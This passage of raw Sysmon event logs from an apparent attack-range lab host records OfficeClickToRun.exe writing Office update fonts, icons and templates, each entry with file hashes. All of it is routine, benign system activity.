Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_I.TTFMD5=CEC8A6834241575DCAFBA6D7504D64B8,SHA256=960458B4C0851B8B9F1D047FE50F7FA01DDFBECAEC692521D262660882E9596A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_CR.TTFMD5=E3D5EC4C7E5F3041C277D5CF3D518C71,SHA256=0F1F746F293E547F8189783C49AEE22A8B839698F7493B5915CC5B432C65D843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_CI.TTFMD5=1012DFD260BF0B2AD3918CEE622B0A0E,SHA256=37194E3C2D5B000443D23DC324B1367CBE2BE40F28C2A6C693E6051210432CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_CBI.TTFMD5=91BDF43645BF910C4E47619624605C18,SHA256=24FD78549262987502D83EA0BCE5B47A3A0AC85C3941921B241A73FCA08DD012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_CB.TTFMD5=C84E3CD501BEE997A464F9CAAF9DBD18,SHA256=F307DE012E77219A25EF59ADA33820A3E33F6865C911ACDD97440C15058713FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_BLAR.TTFMD5=266447F91E71C4700D74AAB76FBC3870,SHA256=63261985FC00D6DB2DDA4F22DA039C70F3C4C90AA0F087FC1B7A8C9856F2B551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_BLAI.TTFMD5=88223FEA14008BF33F1BD87CEDF7ABB2,SHA256=29854F6597CA7B46DB601C7A2EB28C13E31EE0541C7A5A499581FDEE8DA1B1D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_BI.TTFMD5=5BB67E55DE4EE82AFF5585B7BC7DF099,SHA256=9729E2AE73B15871DB606A18A48B8674CE2BAE35D76A511D3510C4A9DB2385EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BOD_B.TTFMD5=78DBEC8A37F162877CDAAA6A09A5E95E,SHA256=051B0031DB491FA893FEDDD485B917B24A9D12F15A1E99E782C2420DA0A3FFB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BKANT.TTFMD5=3EFD8E6A45B3F893F54399C6BF4ABA68,SHA256=C019F155A0004760F32079C22C29EF0DDD223D0C2C79E2487122E66D38A53B32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BERNHC.TTFMD5=A552118CEEE33DFF8A6ACAB5D1C10B60,SHA256=8715897A451AA9E37353B6CCE5F5F3D853ECBE97DE87756838704EFF47C8CE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BELLI.TTFMD5=BA1290CBCB6AAA574890480E1C6AAAE8,SHA256=17B6E7689E333FEA42B19D817427CECF95B86A340BB0AF5BABBA3AB25E6A1B40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BELLB.TTFMD5=F37324D3575C7132E330AF3C8F08DA17,SHA256=DCC8D42EEBBAB6822F736A7B99E1C9D6EE6861B247A19049BB33E5955D991DDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BELL.TTFMD5=1C4AB54D66597DF75CA60FDCE4F7D5A1,SHA256=986A5B8BB70238E3C896E3113EF581DF26204131F72D59FC12D2DEEF7EF89E4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BAUHS93.TTFMD5=BA85C44C8386C4AFE97A6A88B3A37442,SHA256=8AFB4DA281E19745D582814BDC66006BD56F43EB2FD0D2F88D854771472420B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\BASKVILL.TTFMD5=9ECEC61376083FD290B75D94FDACA380,SHA256=529C972A6D5C1992C76E908255F655F98989B74B146058C90555AF6D925A1715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ARLRDBD.TTFMD5=2D1068A7F51E1FC2C63D81165BF52422,SHA256=D9352E7D73711F006A27F44E71808A74FEC109E2342E680E054C4458569F0A94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ARIALNI.TTFMD5=989670C4C82248BB6A8CEC3558212374,SHA256=FAF73AA7CE40B77AD19C09507A2263FE3F3CE9FA5642E8A1CD54FB3C9F52D599,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ARIALNBI.TTFMD5=56E394B38FBF81AFB437BC00884544F8,SHA256=161B859EFD20C69DDEBB23012A49F4F2030D56A0C1B9BCFD4DF753217CE3E358,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ARIALNB.TTFMD5=6DEBD7B47FBF196D9AEA1DC4235439BB,SHA256=6C4A4B643461DEF5411E0217B74A625DCF2FB681252EF5DA1DB0AF4EAE80AA7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ARIALN.TTFMD5=D20BA4EAAF26B7033DA05FD59ED020AB,SHA256=CAD552553CF2A75AFCA01955751AAA115E2A64FD6C6EEA42E1FBD236630B7E0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ANTQUAI.TTFMD5=23ED00385DAB0F612E66EB0D4AC947AB,SHA256=6B00590BD7A52A94E9E90E35A28C1D2FA03F83F458D2F2DFBCED70A9C1EA0C80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ANTQUABI.TTFMD5=F351B29BA23C793C7D9B8C46ACDB2050,SHA256=BC546E3E96F8CDD9E6CF02EB5C8AC5551EF20EF4639FF701C338EA281F56FBD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ANTQUAB.TTFMD5=714EAC0421A6BDD26E69255776F0FFED,SHA256=134A9F8ECF618660305D7D34B6905375C1D5D7838EA15CDB2789BA94317F4117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\ALGER.TTFMD5=A9BC731EF79E8DFBA0A32016E5B39076,SHA256=D0B3B7CD48A047CDB7FA610D060807BE44FCA80F05CE4BF7557C4800F908E48A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\AGENCYR.TTFMD5=70777E6BD210190350F7C92395C1860F,SHA256=D672EB87A3787BDAF8F75DF50F9ADE864E2D5C9CDEC5B07CE6DE9D7D39433EA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\AGENCYB.TTFMD5=596E78C7D8F0D85090A9AF4E8E19076C,SHA256=4FDE694CC486B55266F7561C685FBD9153EA0003F0C0C39FC744B132051D40C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\SharePointTeamSite.icoMD5=B21349B09DD1DF8E99488747F83AE679,SHA256=DB6CF53323E305B55881E24EAC1A63BFC3AAD30DF2F8A37699480F70E66E5351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\SharePointPortalSite.icoMD5=10FAA114FB8813EE41B192924BE81668,SHA256=DD8075CB0AD654C15E7A8EE6BC9908164A0314672B9FAEB69BCC62E42CF3ED03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\MySite.icoMD5=90F8D4CFA4A0B76A6299FEDF3391A061,SHA256=F358343F8D2239E316E12130EB0CB8EFBCB696705A82444EB46CEADF0D9A2650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\MySharePoints.icoMD5=20CFAC41BEC781705402FEA5D4189950,SHA256=D0A8A056D73C8CB1710D999BBE2A27176F31AB0D52469242F080C6D36D323CF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\DocumentRepository.icoMD5=17CD612FC869D247280277B7797AFBCA,SHA256=D12CAE5B4E6BB2A7ADC77D52565038FBDA8E3DA919E3EE2890F9DC7159F47FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Common AppData\Microsoft\OFFICE\AssetLibrary.icoMD5=CA98EA80630E3F5F0DD4AB39BD25FFB5,SHA256=5D8E1D9C9D7D8A54B35B9DC70224E6D6FA19518977492B92D54F98ACE9EFC7A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\Presentation Designs\Maple.gifMD5=2F932ADC174AB0F538D6107550F8DBCE,SHA256=F719764884E5D8FDE201E46760013D5DC7A4544E93DC5B44F3991D18392A9788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Word 2010 look.dotxMD5=01333859D6F4E6459C50C12511CD178C,SHA256=3CBFC8E2A36F839181D476667BF72184A1CE0C73BE2E5B96C72650E0F5B67A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\WidescreenPresentation.potxMD5=C4ADEE19E9F143D27C86647B215E7C89,SHA256=FBD2E9D2F75F3219F65F86D5C4CDC77358629A7977B86AE2C2A9EBEAF070DA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\Training.potxMD5=5B85EC4FE68D5389F7E8AF586AEC55CF,SHA256=D369BBDA842EDEE056312050F67E64553C27ABD4E696D489AE97255345669F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\TimelessResume.dotxMD5=8C05B1397DE7E423D4579DABA9718BCD,SHA256=BBC9F27D62BAA755CDEE88F8A4931A5C16B7ED34DF20DF9A8EE4E4ADA3CF81C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\TimelessReport.dotxMD5=11816E0613E774BB839AA48965F8073B,SHA256=7B29EFCF3FF126ADD282751649BA974BAD926A5834C1D13655DB1FD550AE8D10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\TimelessLetter.dotxMD5=0FACC193EAD6D87EEBB1971D8C89F6F9,SHA256=B008A3ED10E960776C8AD33D8B3B09234E95FCFEE3522E913AF9E425D5B6AD32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\TimeCard.xltxMD5=EECA5F49B56DDE0BB8487E0487405365,SHA256=8D4CA2D0ED920EE81D6F102091EDD06E9FE01F194C2942DF25D91EB2C6FA96B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\StudentReport.dotxMD5=56B5747732F1646BD9A7481F33ECF52F,SHA256=9C06594E9745FED9CB5BCC83EBFF658FA152822CF5AC8DCFC8952FFA69EE948E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\SalesReport.xltxMD5=F43F06AAB00DDB548BC5417E1F159B75,SHA256=FB0D5B968D5DB81D3243B42EA1A03A88B5D08C23536E27E78063DEC6A4A3F770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\RedAndBlackReport.dotxMD5=0983B9779F75240B568258EB44BAFB2B,SHA256=3D9E16B417EA33BC59F6F5274EF36931A4CC28BB64214379E9B1949B3D05F902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Templates\1033\RedAndBlackLetter.dotxMD5=CF34599BBAC039285942996D6E6C9318,SHA256=3AF77B8B28052D6223755FE813004B24EBE060C89C2D02E17024CC21B5C4E040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 